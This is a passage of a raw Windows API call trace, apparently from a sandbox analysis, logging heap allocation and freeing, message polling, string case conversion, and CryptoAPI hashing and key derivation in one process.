[0266.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0266.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0266.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0266.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.050] CryptHashData (hHash=0xaa57a0, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0266.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0266.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0266.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0266.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0266.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0266.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0266.051] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0266.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0266.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0266.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0266.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0266.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.051] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.051] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0266.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0266.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0266.051] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.052] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0266.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0266.052] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.052] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.052] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.052] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0266.052] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.052] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0266.052] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.052] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.052] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.052] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa57a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58e0) returned 1 [0266.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0266.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0266.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0266.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0266.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0266.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0266.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0266.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0266.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0266.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0266.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0266.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0266.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0266.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0266.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0266.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0266.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0266.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0266.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0266.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0266.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0266.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0266.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0266.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0266.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0266.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0266.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0266.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0266.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0266.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0266.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0266.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0266.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0266.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0266.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0266.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0266.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0266.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0266.056] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0266.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0266.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0266.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0266.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0266.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0266.056] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0266.057] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0266.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0266.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0266.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0266.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.057] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0266.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0266.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0266.062] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.062] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0266.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0266.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0266.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0266.063] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0266.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.063] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0266.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.063] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0266.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0266.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.064] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0266.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.064] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0266.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0266.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0266.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.065] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0266.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0266.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0266.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0266.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466db0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0266.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0266.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0266.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0266.066] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0266.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0266.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0266.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0266.066] CryptDestroyHash (hHash=0xaa57a0) returned 1 [0266.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0266.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0266.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0266.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0266.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0266.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.067] 